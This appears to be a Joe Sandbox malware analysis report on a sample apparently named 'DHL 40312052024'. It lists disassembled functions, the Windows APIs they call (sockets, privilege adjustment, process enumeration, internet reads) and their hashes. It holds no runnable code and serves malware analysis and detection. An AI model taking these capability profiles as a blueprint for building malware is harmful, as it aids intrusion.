                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                                    • String ID: $@$SeShutdownPrivilege
                                                                                    • API String ID: 2234035333-194228
                                                                                    • Opcode ID: 93e26bb29598be5ab0b53673c07bbc6edb92688ab5963704ac8076bfe468ec3f
                                                                                    • Instruction ID: 076d58e7401339bba8b70561bf0c0ba6aabb06dc9b41baacd2e5b47bf06ef598
                                                                                    • Opcode Fuzzy Hash: 93e26bb29598be5ab0b53673c07bbc6edb92688ab5963704ac8076bfe468ec3f
                                                                                    • Instruction Fuzzy Hash: C001F732B91615EBE76862689C9AFFB725CFF89744F200821F957E20D2DA711CC08590
                                                                                    Function 00826283 Relevance: 9.1, APIs: 6, Instructions: 84networkCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 008262DC
                                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 008262EB
                                                                                    • bind.WSOCK32(00000000,?,00000010), ref: 00826307
                                                                                    • listen.WSOCK32(00000000,00000005), ref: 00826316
                                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00826330
                                                                                    • closesocket.WSOCK32(00000000,00000000), ref: 00826344
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$bindclosesocketlistensocket
                                                                                    • String ID:
                                                                                    • API String ID: 1279440585-0
                                                                                    • Opcode ID: e9ec3cb35a2ea6509c7e927869e5de8ce137bf0af1e3229b2b0463270829004d
                                                                                    • Instruction ID: 72aab4e0b6104105f0fd051adc510ba3cfa1cc1333bd2fd80efdbb55715052d2
                                                                                    • Opcode Fuzzy Hash: e9ec3cb35a2ea6509c7e927869e5de8ce137bf0af1e3229b2b0463270829004d
                                                                                    • Instruction Fuzzy Hash: BF21CE30600214AFCB10EF68DC49B6EB7B9FF89720F144569EA26E7392D770AC51CB91
                                                                                    Function 007C5520 Relevance: 8.0, APIs: 5, Instructions: 516COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 007D0DB6: std::exception::exception.LIBCMT ref: 007D0DEC
                                                                                      • Part of subcall function 007D0DB6: __CxxThrowException@8.LIBCMT ref: 007D0E01
                                                                                    • _memmove.LIBCMT ref: 00800258
                                                                                    • _memmove.LIBCMT ref: 0080036D
                                                                                    • _memmove.LIBCMT ref: 00800414
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: _memmove$Exception@8Throwstd::exception::exception
                                                                                    • String ID:
                                                                                    • API String ID: 1300846289-0
                                                                                    • Opcode ID: 0e4b82b486727c5f7f4317cb2e7ca60e554f570991f933dd42f9eac5b92541a2
                                                                                    • Instruction ID: 7ce38215cc96fcd0ee07bdd61e29fe24aace17fd367841775ec452955d80c0e3
                                                                                    • Opcode Fuzzy Hash: 0e4b82b486727c5f7f4317cb2e7ca60e554f570991f933dd42f9eac5b92541a2
                                                                                    • Instruction Fuzzy Hash: A7026DB0A00209DBCF44DF64D985BAE7BB5FF44300F558069E806DB395EB39E950CB95
                                                                                    Function 007B1287 Relevance: 7.9, APIs: 5, Instructions: 379COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 007B2612: GetWindowLongW.USER32(?,000000EB), ref: 007B2623
                                                                                    • DefDlgProcW.USER32(?,?,?,?,?), ref: 007B19FA
                                                                                    • GetSysColor.USER32(0000000F), ref: 007B1A4E
                                                                                    • SetBkColor.GDI32(?,00000000), ref: 007B1A61
                                                                                      • Part of subcall function 007B1290: DefDlgProcW.USER32(?,00000020,?), ref: 007B12D8
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: ColorProc$LongWindow
                                                                                    • String ID:
                                                                                    • API String ID: 3744519093-0
                                                                                    • Opcode ID: cfd49ebfe0369816ab22a8317d534f8fe7052b689e8fbf05b307fe80cb1b3c46
                                                                                    • Instruction ID: ad42277a75afddc09f8d1da493f82a84fe59a8f3528f0b0d2a24f03fd5e941b5
                                                                                    • Opcode Fuzzy Hash: cfd49ebfe0369816ab22a8317d534f8fe7052b689e8fbf05b307fe80cb1b3c46
                                                                                    • Instruction Fuzzy Hash: 34A117711075C4FAEB28AA399C6CFFB3A5CEB85345FD48119F502D6192CA2CBD0196B2
                                                                                    Function 0081BCBC Relevance: 7.6, APIs: 5, Instructions: 143fileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 0081BCE6
                                                                                    • _wcscmp.LIBCMT ref: 0081BD16
                                                                                    • _wcscmp.LIBCMT ref: 0081BD2B
                                                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 0081BD3C
                                                                                    • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0081BD6C
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: Find$File_wcscmp$CloseFirstNext
                                                                                    • String ID:
                                                                                    • API String ID: 2387731787-0
                                                                                    • Opcode ID: aba194938229aaddc75d7cc8fbac113f12768aa8909e69e61bfc8b401dd9e096
                                                                                    • Instruction ID: bb74bc2559473357783fa495089ec8378e994f2f08f0248c37ea49e8018e1a10
                                                                                    • Opcode Fuzzy Hash: aba194938229aaddc75d7cc8fbac113f12768aa8909e69e61bfc8b401dd9e096
                                                                                    • Instruction Fuzzy Hash: 8C516675A04602DFD718DF28D490EEAB7E8FF49324F104619EA66C73A1DB34A944CB91
                                                                                    Function 00826747 Relevance: 7.6, APIs: 5, Instructions: 141networkCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 00827D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00827DB6
                                                                                    • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 0082679E
                                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 008267C7
                                                                                    • bind.WSOCK32(00000000,?,00000010), ref: 00826800
                                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 0082680D
                                                                                    • closesocket.WSOCK32(00000000,00000000), ref: 00826821
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                                                                    • String ID:
                                                                                    • API String ID: 99427753-0
                                                                                    • Opcode ID: 7bfbb71011cfb7e1e56030a3984009cb05a6e89b87b3e73b5a49b5868086cb89
                                                                                    • Instruction ID: 6765d4218479f5feeb6351b33983e07af3bbf2e7a02f2cce6529414a3a1b9f16
                                                                                    • Opcode Fuzzy Hash: 7bfbb71011cfb7e1e56030a3984009cb05a6e89b87b3e73b5a49b5868086cb89
                                                                                    • Instruction Fuzzy Hash: 2341C475B00214AFDB50BF249C8AFAE77A8EF49714F048568FB15AB3D3DA749D008792
                                                                                    Function 00835376 Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                    • String ID:
                                                                                    • API String ID: 292994002-0
                                                                                    • Opcode ID: c8b1bc263e8377fd48488e2f51ad0c7e8f1105a8c1e4786a028bfc8e4dad49f6
                                                                                    • Instruction ID: 20b4fdb6d3e416724eb5b0f542f2450dbe6eed1e6b98336e5807761f1fa9cd7b
                                                                                    • Opcode Fuzzy Hash: c8b1bc263e8377fd48488e2f51ad0c7e8f1105a8c1e4786a028bfc8e4dad49f6
                                                                                    • Instruction Fuzzy Hash: 1711B271700911AFEB215F269C48B6ABBA9FFC67A1F404429F945D3242DBB4DD0186E4
                                                                                    Function 008080A9 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 008080C0
                                                                                    • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 008080CA
                                                                                    • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 008080D9
                                                                                    • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 008080E0
                                                                                    • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 008080F6
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                    • String ID:
                                                                                    • API String ID: 44706859-0
                                                                                    • Opcode ID: d41b1af0b36af68efbdb1efe25a124ea5c0b29dbd70e3168ffa552e7a9aaa871
                                                                                    • Instruction ID: 61235b2c7d326b9ccadbbce6de0a4a3ca9b1e160b007a70d2bf64bf1fee9b8c1
                                                                                    • Opcode Fuzzy Hash: d41b1af0b36af68efbdb1efe25a124ea5c0b29dbd70e3168ffa552e7a9aaa871
                                                                                    • Instruction Fuzzy Hash: 42F06231640204EFEB115FA5EC8DE6B3BACFF89755F000425FA85C62A1CBA1DC45DEA0
                                                                                    Function 0081C397 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 279comCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CoInitialize.OLE32(00000000), ref: 0081C432
                                                                                    • CoCreateInstance.OLE32(00842D6C,00000000,00000001,00842BDC,?), ref: 0081C44A
                                                                                      • Part of subcall function 007B7DE1: _memmove.LIBCMT ref: 007B7E22
                                                                                    • CoUninitialize.OLE32 ref: 0081C6B7
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateInitializeInstanceUninitialize_memmove
                                                                                    • String ID: .lnk
                                                                                    • API String ID: 2683427295-24824748
                                                                                    • Opcode ID: 392973097254a4f1f87f6f983453a836ac09f0f864c9a10b31c1626ecfecdd97
                                                                                    • Instruction ID: 8e88c5fa82f00e40abf617d672408b8b833c36e0cb97c277f25faf9dd299db6e
                                                                                    • Opcode Fuzzy Hash: 392973097254a4f1f87f6f983453a836ac09f0f864c9a10b31c1626ecfecdd97
                                                                                    • Instruction Fuzzy Hash: A1A16A71208205AFD700EF54C885EABB7ECFF95344F00492DF255871A2EB74EA49CB52
                                                                                    Function 007B4B37 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,007B4AD0), ref: 007B4B45
                                                                                    • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 007B4B57
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressLibraryLoadProc
                                                                                    • String ID: GetNativeSystemInfo$kernel32.dll
                                                                                    • API String ID: 2574300362-192647395
                                                                                    • Opcode ID: 51f5556c521262fc8fc54fb7f0d956267b2fc6fdb1df638ad3604dd3cd0a18c2
                                                                                    • Instruction ID: dabf1aa7dea82456efb284a8bbbd71961cda197537d646ad909e46830f9fe00c
                                                                                    • Opcode Fuzzy Hash: 51f5556c521262fc8fc54fb7f0d956267b2fc6fdb1df638ad3604dd3cd0a18c2
                                                                                    • Instruction Fuzzy Hash: 8DD012B4E10713DFDB209F31E818B47B6D4BF85351F118C399695D6261D778D480C6D4
                                                                                    Function 0082EE0D Relevance: 6.2, APIs: 4, Instructions: 164processCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CreateToolhelp32Snapshot.KERNEL32 ref: 0082EE3D
                                                                                    • Process32FirstW.KERNEL32(00000000,?), ref: 0082EE4B
                                                                                      • Part of subcall function 007B7DE1: _memmove.LIBCMT ref: 007B7E22
                                                                                    • Process32NextW.KERNEL32(00000000,?), ref: 0082EF0B
                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?), ref: 0082EF1A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                                                                                    • String ID:
                                                                                    • API String ID: 2576544623-0
                                                                                    • Opcode ID: 4d7cccbcd2d98e216877cec266a049590ac646230f5cbb08afb5d5424719489a
                                                                                    • Instruction ID: c92578e9e36b4dbb6325d4c64709ad24248127612fa2bb5a5a49bceece9630d7
                                                                                    • Opcode Fuzzy Hash: 4d7cccbcd2d98e216877cec266a049590ac646230f5cbb08afb5d5424719489a
                                                                                    • Instruction Fuzzy Hash: 75517C71508311AFD310EF24D885FABB7E8FF94710F04492DF595D62A1EB74A908CB92
                                                                                    Function 0080E616 Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 561stringCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • lstrlenW.KERNEL32(?,?,?,00000000), ref: 0080E628
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: lstrlen
                                                                                    • String ID: ($|
                                                                                    • API String ID: 1659193697-1631851259
                                                                                    • Opcode ID: fa75ff47f62c0ac0b000281d3c22408d4ca7c183c87022175ab429db33a20314
                                                                                    • Instruction ID: 0eb25da946d2c577ca10d878555703d57acc57d82bf24c92ebfa6c938c59c287
                                                                                    • Opcode Fuzzy Hash: fa75ff47f62c0ac0b000281d3c22408d4ca7c183c87022175ab429db33a20314
                                                                                    • Instruction Fuzzy Hash: D7323575A00705DFD768CF19C480A6AB7F1FF58320B15C86EE89ADB3A1E770A941CB40
                                                                                    Function 008222EE Relevance: 4.7, APIs: 3, Instructions: 164networkfileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,0082180A,00000000), ref: 008223E1
                                                                                    • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00822418
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: Internet$AvailableDataFileQueryRead
                                                                                    • String ID:
                                                                                    • API String ID: 599397726-0
                                                                                    • Opcode ID: 102965a15df51a1ddd62da1a4df28121dea5628af8664b7af63477355faae416
                                                                                    • Instruction ID: 09142f11b567a9c3fae1d9e037c28a0c4ae8079bf5661f1670686a9e3be529d4
                                                                                    • Opcode Fuzzy Hash: 102965a15df51a1ddd62da1a4df28121dea5628af8664b7af63477355faae416
                                                                                    • Instruction Fuzzy Hash: 5F41E871904219FFEB10EE95EC89FBB77BCFB40318F10406EF601E6251DA759E819654
                                                                                    Function 0081B3FB Relevance: 4.6, APIs: 3, Instructions: 73COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SetErrorMode.KERNEL32(00000001), ref: 0081B40B
                                                                                    • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 0081B465
                                                                                    • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 0081B4B2
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorMode$DiskFreeSpace
                                                                                    • String ID:
                                                                                    • API String ID: 1682464887-0
                                                                                    • Opcode ID: dfcdc1e554aa570503a6bc4399a0606270c0be6eb18a16341d5e13f2d9201a7e
                                                                                    • Instruction ID: e4ad1191314ce27989dc08c8640615f8b358021b3671d32b923c6d05dcdb3c10
                                                                                    • Opcode Fuzzy Hash: dfcdc1e554aa570503a6bc4399a0606270c0be6eb18a16341d5e13f2d9201a7e
                                                                                    • Instruction Fuzzy Hash: 37214175A00108EFCB00EFA5D885EEDBBB8FF49314F1480A9E905EB362DB319955CB55
                                                                                    Function 008087E1 Relevance: 4.6, APIs: 3, Instructions: 67COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 007D0DB6: std::exception::exception.LIBCMT ref: 007D0DEC
                                                                                      • Part of subcall function 007D0DB6: __CxxThrowException@8.LIBCMT ref: 007D0E01
                                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0080882B
                                                                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00808858
                                                                                    • GetLastError.KERNEL32 ref: 00808865
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                                                    • String ID:
                                                                                    • API String ID: 1922334811-0
                                                                                    • Opcode ID: 8648bdf93906aded32ce0490c4c1f6e0486c00961523c3a10dc3983dcefe4877
                                                                                    • Instruction ID: c08c78a8c9ed24dcc6a735c4d04f9ebb587802b027444b57fb6ba92f94781780
                                                                                    • Opcode Fuzzy Hash: 8648bdf93906aded32ce0490c4c1f6e0486c00961523c3a10dc3983dcefe4877
                                                                                    • Instruction Fuzzy Hash: A9116DB2914204EFE718DFA4DC85D6BB7B9FB44710B20852EE49597351EB30AC408BA0
                                                                                    Function 0080874B Relevance: 4.5, APIs: 3, Instructions: 43memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00808774
                                                                                    • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 0080878B
                                                                                    • FreeSid.ADVAPI32(?), ref: 0080879B
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
